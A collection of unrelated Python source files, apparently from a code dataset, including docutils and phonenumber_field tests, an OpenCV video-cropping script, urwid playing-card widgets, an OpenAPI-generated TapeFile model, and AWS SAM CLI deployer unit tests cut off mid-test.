return PlotlyEvaluator()
elif isinstance(result, cubepy.Cube) or isinstance(result, cubepy.Index):
return CubepyEvaluator()
else:
_dir = dir(result)
if len(list(set(_dir) & set(Evaluator.ipytonMethods))) > 0:
return IPythonEvaluator()
else:
return BaseEvaluator()
|
python
|
#! /usr/bin/env python
# $Id: test_class.py 5174 2007-05-31 00:01:52Z wiemann $
# Author: Lea Wiemann <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Tests for the 'class' directive.
"""
from __init__ import DocutilsTestSupport
def suite():
s = DocutilsTestSupport.ParserTestSuite()
s.generateTests(totest)
return s
totest = {}
totest['class'] = [
["""\
.. class:: class1 class2
""",
"""\
<document source="test data">
<pending>
.. internal attributes:
.transform: docutils.transforms.misc.ClassAttribute
.details:
class: ['class1', 'class2']
directive: 'class'
"""],
["""\
.. class:: class1 class2
The classes are applied to this paragraph.
And this one.
""",
"""\
<document source="test data">
<paragraph classes="class1 class2">
The classes are applied to this paragraph.
<paragraph classes="class1 class2">
And this one.
"""],
]
if __name__ == '__main__':
import unittest
unittest.main(defaultTest='suite')
|
python
|
# coding:utf-8
# 将图片以小分片的形式裁剪下来
import tkFileDialog
import cv2
from configurationInjection import configInjection
import os
config = configInjection()
config.loadConfiguration()
rois = config.rois[0]
flag = True
videopath = tkFileDialog.askopenfilename(initialdir="/home/zb/myfile/cutSave")
count = 0
cap = cv2.VideoCapture(videopath)
while flag:
flag, img = cap.read()
basePath = "/home/zb/myfile/cutSave/1-1"
framesBasePath = "/home/zb/myfile/cutSave/1-1/frames7"
if not os.path.exists(basePath):
os.mkdir(basePath)
if not os.path.exists(framesBasePath):
os.mkdir(framesBasePath)
bigSlice = img[360:1080, 480:1440]
# cv2.imwrite(basePath + "/" + str(count) + ".jpg", bigSlice)
for roi in rois:
slice = img[roi[2]:roi[3], roi[0]:roi[1]]
count += 1
cv2.imwrite(framesBasePath + "/" + str(count) + ".jpg", slice)
cap.release()
|
python
|
# -*- coding: utf-8 -*-
"""form base classes for aloha-editor integration"""
import floppyforms as forms
from djaloha.widgets import AlohaInput
from django.utils.encoding import smart_unicode
class DjalohaForm(forms.Form):
"""Base class for form with aloha editor"""
def __init__(self, model_class, lookup, field_name, data=None, field_value=None, *args, **kwargs):
super(DjalohaForm, self).__init__(data, *args, **kwargs)
self._model_class = model_class
self._lookup = lookup
self._field_name = field_name
model_name = "__".join(
(model_class.__module__.split('.')[-2], model_class.__name__)
)
lookup_str = "__".join([k + "__" + unicode(v).strip('"\'') for (k, v) in lookup.items()])
self._form_field = "__".join(
("djaloha", model_name, lookup_str, field_name)
)
self.fields[self._form_field] = forms.CharField(
required=False,
initial=field_value,
widget=AlohaInput()
)
def save(self):
"""save associated object"""
value = smart_unicode(self.cleaned_data[self._form_field])
obj = self._model_class.objects.get_or_create(**self._lookup)[0]
setattr(obj, self._field_name, value)
obj.save()
def as_is(self):
"""return html without parent tag"""
return self._html_output(
normal_row=u'%(field)s',
error_row=u'%s',
row_ender='',
help_text_html=u'',
errors_on_separate_row=True
)
|
python
|
"""Replays
RocketLeagueReplays API module
"""
import requests
BASE_URL = 'https://www.rocketleaguereplays.com/api/replays/?page='
def get_replays(page_num):
"""
Requests a page of replay data from the RocketLeagueReplaysAPI
:param page_num: Page number to request
:return: list of matches returned
"""
url = f'{BASE_URL}{page_num}'
result = requests.get(url).json()
matches = result['results']
return matches
|
python
|
# -*- coding: utf-8 -*-
import urwid
PALETTE = [
('red', 'dark red', ''),
('selectedred', 'dark red', 'yellow'),
('selected', '', 'yellow'),
]
# Modify these as needed
SIZES = {'small': (4, 3), 'medium': (6, 4), 'large': (8, 6)}
card_size = 'large'
class BaseCardWidget(urwid.WidgetWrap):
def __init__(self, *args, **kw):
self.card_columns, self.card_rows = SIZES[card_size]
super(BaseCardWidget, self).__init__(*args, **kw)
self.redraw()
def redraw(self):
self.text.set_text(self._draw_card_text())
def _draw_card_text(self):
raise NotImplementedError
class SpacerWidget(BaseCardWidget):
def __init__(self, **kw):
self.text = urwid.Text('', wrap='clip')
super(SpacerWidget, self).__init__(self.text)
def _draw_card_text(self):
# The decrement of rows is to account for expanding space in
# the vertical direction
return [u' '* self.card_columns +'\n'] * (self.card_rows-1)
class EmptyCardWidget(BaseCardWidget):
def __init__(self, onclick=None, **kw):
self.onclick = onclick
self.text = urwid.Text('', wrap='clip')
super(EmptyCardWidget, self).__init__(self.text)
def _draw_card_text(self):
return [
u'╭' + u'─' * (self.card_columns-2) + u'╮\n'
+ (self.card_rows-2) * (u'│'+ ' ' * (self.card_columns-2) + u'│\n')
+ u'╰' + u'─' * (self.card_columns-2) + u'╯\n'
]
def selectable(self):
return bool(self.onclick)
def mouse_event(self, size, event, button, col, row, focus):
if event == 'mouse press':
if self.onclick:
self.onclick(self)
def iter_widgets(self):
return iter([])
class CardWidget(BaseCardWidget):
def __init__(self, card, row_index, col_index, onclick=None):
self._card = card
self.row_index = row_index
self.col_index = col_index
self.text = urwid.Text('', wrap='clip')
self.highlighted = False
self.onclick = onclick
super(CardWidget, self).__init__(self.text)
def __repr__(self):
return '{}(card={!r}, highlighted={!r}, ...)'.format(
self.__class__.__name__, self.card, self.highlighted,
)
def mouse_event(self, size, event, button, col, row, focus):
if event == 'mouse press':
if self.onclick:
self.onclick(self)
def _draw_card_text(self):
columns, rows = self.card_columns, self.card_rows
style = 'selected' if self.highlighted else ''
redornot = 'red' if self.card.suit in ('hearts', 'diamonds') else ''
if self.highlighted:
redornot = 'selected' + redornot
if not self.face_up:
face_down_middle_filling = (columns-2) * u'╬'
filling = [u'│', (style, face_down_middle_filling), u'│\n'] * (rows-2)
else:
rank, suit = (self.card.rank, self.card.suit_symbol)
spaces = (columns-5) * ' '
filling = [u'│', (redornot, u'{}{}{}'.format(rank.ljust(2), spaces, suit)), u'│\n']
filling += (
[u'│', (style, u' ' * (columns-2)), u'│\n'] * (rows-4) +
[u'│', (redornot, u'{}{}{}'.format(suit, spaces,rank.rjust(2))), u'│\n']
)
top = u'╭'+ u'─' * (columns-2) + u'╮\n'
text = [top] + filling
text += [u'╰' + u'─' * (columns-2) + u'╯\n']
if isinstance(text[-1], tuple):
text[-1] = text[-1][0], text[-1][1].strip()
else:
text[-1] = text[-1].strip()
return text
@property
def card(self):
return self._card
@card.setter
def card(self, card):
self._card = card
self.redraw()
@property
def face_up(self):
return self.card.face_up
@face_up.setter
def face_up(self, val):
self.card.face_up = bool(val)
self.redraw()
|
python
|
# coding: utf-8
"""
ELEMENTS API
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from elements_sdk.configuration import Configuration
class TapeFile(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'int',
'tape': 'Tape',
'path': 'str',
'search_highlight': 'str',
'uid': 'int',
'name': 'str',
'is_dir': 'bool',
'read_only': 'bool',
'length': 'int',
'checksum': 'str',
'fullpath': 'str',
'parent': 'int'
}
attribute_map = {
'id': 'id',
'tape': 'tape',
'path': 'path',
'search_highlight': 'search_highlight',
'uid': 'uid',
'name': 'name',
'is_dir': 'is_dir',
'read_only': 'read_only',
'length': 'length',
'checksum': 'checksum',
'fullpath': 'fullpath',
'parent': 'parent'
}
def __init__(self, id=None, tape=None, path=None, search_highlight=None, uid=None, name=None, is_dir=None, read_only=None, length=None, checksum=None, fullpath=None, parent=None, local_vars_configuration=None): # noqa: E501
"""TapeFile - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._tape = None
self._path = None
self._search_highlight = None
self._uid = None
self._name = None
self._is_dir = None
self._read_only = None
self._length = None
self._checksum = None
self._fullpath = None
self._parent = None
self.discriminator = None
if id is not None:
self.id = id
if tape is not None:
self.tape = tape
self.path = path
if search_highlight is not None:
self.search_highlight = search_highlight
self.uid = uid
self.name = name
if is_dir is not None:
self.is_dir = is_dir
if read_only is not None:
self.read_only = read_only
if length is not None:
self.length = length
self.checksum = checksum
self.fullpath = fullpath
self.parent = parent
@property
def id(self):
"""Gets the id of this TapeFile. # noqa: E501
:return: The id of this TapeFile. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this TapeFile.
:param id: The id of this TapeFile. # noqa: E501
:type: int
"""
self._id = id
@property
def tape(self):
"""Gets the tape of this TapeFile. # noqa: E501
:return: The tape of this TapeFile. # noqa: E501
:rtype: Tape
"""
return self._tape
@tape.setter
def tape(self, tape):
"""Sets the tape of this TapeFile.
:param tape: The tape of this TapeFile. # noqa: E501
:type: Tape
"""
self._tape = tape
@property
def path(self):
"""Gets the path of this TapeFile. # noqa: E501
:return: The path of this TapeFile. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this TapeFile.
:param path: The path of this TapeFile. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and path is None: # noqa: E501
raise ValueError("Invalid value for `path`, must not be `None`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
path is not None and len(path) < 1):
raise ValueError("Invalid value for `path`, length must be greater than or equal to `1`") # noqa: E501
self._path = path
@property
def search_highlight(self):
"""Gets the search_highlight of this TapeFile. # noqa: E501
:return: The search_highlight of this TapeFile. # noqa: E501
:rtype: str
"""
return self._search_highlight
@search_highlight.setter
def search_highlight(self, search_highlight):
"""Sets the search_highlight of this TapeFile.
:param search_highlight: The search_highlight of this TapeFile. # noqa: E501
:type: str
"""
self._search_highlight = search_highlight
@property
def uid(self):
"""Gets the uid of this TapeFile. # noqa: E501
:return: The uid of this TapeFile. # noqa: E501
:rtype: int
"""
return self._uid
@uid.setter
def uid(self, uid):
"""Sets the uid of this TapeFile.
:param uid: The uid of this TapeFile. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and uid is None: # noqa: E501
raise ValueError("Invalid value for `uid`, must not be `None`") # noqa: E501
self._uid = uid
@property
def name(self):
"""Gets the name of this TapeFile. # noqa: E501
:return: The name of this TapeFile. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this TapeFile.
:param name: The name of this TapeFile. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
name is not None and len(name) > 255):
raise ValueError("Invalid value for `name`, length must be less than or equal to `255`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
name is not None and len(name) < 1):
raise ValueError("Invalid value for `name`, length must be greater than or equal to `1`") # noqa: E501
self._name = name
@property
def is_dir(self):
"""Gets the is_dir of this TapeFile. # noqa: E501
:return: The is_dir of this TapeFile. # noqa: E501
:rtype: bool
"""
return self._is_dir
@is_dir.setter
def is_dir(self, is_dir):
"""Sets the is_dir of this TapeFile.
:param is_dir: The is_dir of this TapeFile. # noqa: E501
:type: bool
"""
self._is_dir = is_dir
@property
def read_only(self):
"""Gets the read_only of this TapeFile. # noqa: E501
:return: The read_only of this TapeFile. # noqa: E501
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""Sets the read_only of this TapeFile.
:param read_only: The read_only of this TapeFile. # noqa: E501
:type: bool
"""
self._read_only = read_only
@property
def length(self):
"""Gets the length of this TapeFile. # noqa: E501
:return: The length of this TapeFile. # noqa: E501
:rtype: int
"""
return self._length
@length.setter
def length(self, length):
"""Sets the length of this TapeFile.
:param length: The length of this TapeFile. # noqa: E501
:type: int
"""
self._length = length
@property
def checksum(self):
"""Gets the checksum of this TapeFile. # noqa: E501
:return: The checksum of this TapeFile. # noqa: E501
:rtype: str
"""
return self._checksum
@checksum.setter
def checksum(self, checksum):
"""Sets the checksum of this TapeFile.
:param checksum: The checksum of this TapeFile. # noqa: E501
:type: str
"""
if (self.local_vars_configuration.client_side_validation and
checksum is not None and len(checksum) > 255):
raise ValueError("Invalid value for `checksum`, length must be less than or equal to `255`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
checksum is not None and len(checksum) < 1):
raise ValueError("Invalid value for `checksum`, length must be greater than or equal to `1`") # noqa: E501
self._checksum = checksum
@property
def fullpath(self):
"""Gets the fullpath of this TapeFile. # noqa: E501
:return: The fullpath of this TapeFile. # noqa: E501
:rtype: str
"""
return self._fullpath
@fullpath.setter
def fullpath(self, fullpath):
"""Sets the fullpath of this TapeFile.
:param fullpath: The fullpath of this TapeFile. # noqa: E501
:type: str
"""
if (self.local_vars_configuration.client_side_validation and
fullpath is not None and len(fullpath) > 4095):
raise ValueError("Invalid value for `fullpath`, length must be less than or equal to `4095`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
fullpath is not None and len(fullpath) < 1):
raise ValueError("Invalid value for `fullpath`, length must be greater than or equal to `1`") # noqa: E501
self._fullpath = fullpath
@property
def parent(self):
"""Gets the parent of this TapeFile. # noqa: E501
:return: The parent of this TapeFile. # noqa: E501
:rtype: int
"""
return self._parent
@parent.setter
def parent(self, parent):
"""Sets the parent of this TapeFile.
:param parent: The parent of this TapeFile. # noqa: E501
:type: int
"""
self._parent = parent
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TapeFile):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TapeFile):
return True
return self.to_dict() != other.to_dict()
|
python
|
from unittest import mock
from django import forms
from django.test import SimpleTestCase
from django.utils.functional import lazy
from phonenumber_field.formfields import PhoneNumberField
ALGERIAN_PHONE_NUMBER = "+213799136332"
class PhoneNumberFormFieldTest(SimpleTestCase):
def test_error_message(self):
class PhoneNumberForm(forms.Form):
number = PhoneNumberField()
form = PhoneNumberForm({"number": "invalid"})
self.assertIs(form.is_valid(), False)
self.assertEqual(
form.errors, {"number": ["Enter a valid phone number (e.g. +12125552368)."]}
)
def test_override_error_message(self):
class MyPhoneNumberField(PhoneNumberField):
default_error_messages = {"invalid": "MY INVALID MESSAGE!"}
class PhoneNumberForm(forms.Form):
number = MyPhoneNumberField()
form = PhoneNumberForm({"number": "invalid"})
self.assertIs(form.is_valid(), False)
self.assertEqual(form.errors, {"number": ["MY INVALID MESSAGE!"]})
def test_override_error_message_inline(self):
class PhoneNumberForm(forms.Form):
number = PhoneNumberField(
error_messages={"invalid": "MY INLINE INVALID MESSAGE!"}
)
form = PhoneNumberForm({"number": "invalid"})
self.assertIs(form.is_valid(), False)
self.assertEqual(form.errors, {"number": ["MY INLINE INVALID MESSAGE!"]})
def test_algerian_phone_number_in_form(self):
class PhoneNumberForm(forms.Form):
number = PhoneNumberField()
form = PhoneNumberForm({"number": ALGERIAN_PHONE_NUMBER})
self.assertTrue(form.is_valid())
self.assertEqual(ALGERIAN_PHONE_NUMBER, form.cleaned_data["number"])
def test_error_message_lazy(self):
def fail_gettext(msgid):
raise Exception("gettext was called unexpectedly.")
with mock.patch(
"phonenumber_field.formfields._",
side_effect=lazy(fail_gettext, str),
):
PhoneNumberField()
|
python
|
from pkg.command.azcli_cmd import AzCliCommand
from pkg.entity._az_cli import AzCli
from pkg.executor._executor import Executor
from pkg.executor.azcli.command._azcli_cmd_executor import AzCliCommandExecutor
class AzCliExecutor(Executor):
def __init__(self):
pass
def run_az_cli(self, cmd: AzCli):
az_cli_command = AzCliCommand(cmd)
az_cli_cmd_executor = AzCliCommandExecutor(az_cli_command)
return az_cli_cmd_executor.execute()
|
python
|
from logging import captureWarnings
from operator import inv
from typing import Container, Iterable, Union
import uuid
import time
import math
from datetime import datetime, timedelta, timezone
from unittest import TestCase
from unittest.mock import patch, MagicMock, ANY, call
from botocore.exceptions import ClientError, WaiterError, BotoCoreError
from samcli.commands.deploy.exceptions import (
DeployFailedError,
ChangeSetError,
DeployStackOutPutFailedError,
DeployBucketInDifferentRegionError,
)
from samcli.lib.deploy.deployer import Deployer
from samcli.lib.package.s3_uploader import S3Uploader
from samcli.lib.utils.time import utc_to_timestamp, to_datetime
class MockPaginator:
def __init__(self, resp):
self.resp = resp
def paginate(self, ChangeSetName=None, StackName=None):
return self.resp
class MockChangesetWaiter:
def __init__(self, ex=None):
self.ex = ex
def wait(self, ChangeSetName, StackName, WaiterConfig):
if self.ex:
raise self.ex
return
class MockCreateUpdateWaiter:
def __init__(self, ex=None):
self.ex = ex
def wait(self, StackName, WaiterConfig):
if self.ex:
raise self.ex
return
class CustomTestCase(TestCase):
def assertListSubset(self, l1: Iterable, l2: Union[Iterable, Container], msg=None) -> None:
"""
Assert l2 contains all items in l1.
Just like calling self.assertIn(l1[x], l2) in a loop.
"""
for x in l1:
self.assertIn(x, l2, msg)
class TestDeployer(CustomTestCase):
def setUp(self):
self.session = MagicMock()
self.cloudformation_client = self.session.client("cloudformation")
self.s3_client = self.session.client("s3")
self.deployer = Deployer(self.cloudformation_client)
def test_deployer_init(self):
self.assertEqual(self.deployer._client, self.cloudformation_client)
self.assertEqual(self.deployer.changeset_prefix, "samcli-deploy")
def test_deployer_init_custom_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=10)
self.assertEqual(deployer.client_sleep, 10)
def test_deployer_init_custom_sleep_invalid(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep="INVALID")
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_negative(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=-5)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_zero(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=0)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_default_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"))
self.assertEqual(deployer.client_sleep, 0.5)
def test_deployer_has_no_stack(self):
self.deployer._client.describe_stacks = MagicMock(return_value={"Stacks": []})
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_in_review(self):
self.deployer._client.describe_stacks = MagicMock(
return_value={"Stacks": [{"StackStatus": "REVIEW_IN_PROGRESS"}]}
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception_non_exsistent(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Stack with id test does not exist"}},
operation_name="stack_status",
)
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=Exception())
with self.assertRaises(Exception):
self.deployer.has_stack("test")
def test_deployer_has_stack_exception_botocore(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=BotoCoreError())
with self.assertRaises(DeployFailedError):
self.deployer.has_stack("test")
def test_create_changeset(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_update_changeset(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="UPDATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_create_changeset_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(side_effect=Exception)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException(self):
error_message = (
"An error occurred (ValidationError) when calling the CreateChangeSet "
"operation: S3 error: The bucket you are attempting to access must be "
"addressed using the specified endpoint. "
"Please send all future requests to this "
"endpoint.\nFor more information "
"check http://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html"
)
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": error_message}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployBucketInDifferentRegionError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException_generic(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Message"}}, operation_name="create_changeset")
)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_pass_through_optional_arguments_only_if_having_values(self):
self.deployer.has_stack = MagicMock(return_value=False)
# assert that the arguments; Capabilities, RoleARN & NotificationARNs are passed through if having values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
RoleARN="role-arn",
NotificationARNs=[],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
# assert that the arguments; Capabilities, RoleARN & NotificationARNs are not passed through if no values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=None,
role_arn=None,
notification_arns=None,
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_describe_changeset_with_changes(self):
response = [
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Action": "Add"}}
]
},
]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(
changes,
{
"Add": [
{"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Replacement": "N/A"},
],
"Modify": [],
"Remove": [],
},
)
def test_describe_changeset_with_no_changes(self):
response = [{"Changes": []}]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(changes, {"Add": [], "Modify": [], "Remove": []})
def test_wait_for_changeset(self):
self.deployer._client.get_waiter = MagicMock(return_value=MockChangesetWaiter())
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_wait_for_changeset_exception_ChangeEmpty(self):
self.deployer._client.get_waiter = MagicMock(
return_value=MockChangesetWaiter(
ex=WaiterError(
name="wait_for_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(ChangeSetError):
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_execute_changeset(self):
self.deployer.execute_changeset("id", "test", True)
self.deployer._client.execute_change_set.assert_called_with(
ChangeSetName="id", StackName="test", DisableRollback=True
)
def test_execute_changeset_exception(self):
self.deployer._client.execute_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="execute_changeset")
)
with self.assertRaises(DeployFailedError):
self.deployer.execute_changeset("id", "test", True)
def test_get_last_event_time(self):
timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(
return_value={"StackEvents": [{"Timestamp": timestamp}]}
)
self.assertEqual(self.deployer.get_last_event_time("test"), utc_to_timestamp(timestamp))
def test_get_last_event_time_unknown_last_time(self):
current_timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(side_effect=KeyError)
# Convert to milliseconds from seconds
last_stack_event_timestamp = to_datetime(self.deployer.get_last_event_time("test") * 1000)
self.assertEqual(last_stack_event_timestamp.year, current_timestamp.year)
self.assertEqual(last_stack_event_timestamp.month, current_timestamp.month)
self.assertEqual(last_stack_event_timestamp.day, current_timestamp.day)
self.assertEqual(last_stack_event_timestamp.hour, current_timestamp.hour)
self.assertEqual(last_stack_event_timestamp.minute, current_timestamp.minute)
self.assertEqual(last_stack_event_timestamp.second, current_timestamp.second)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
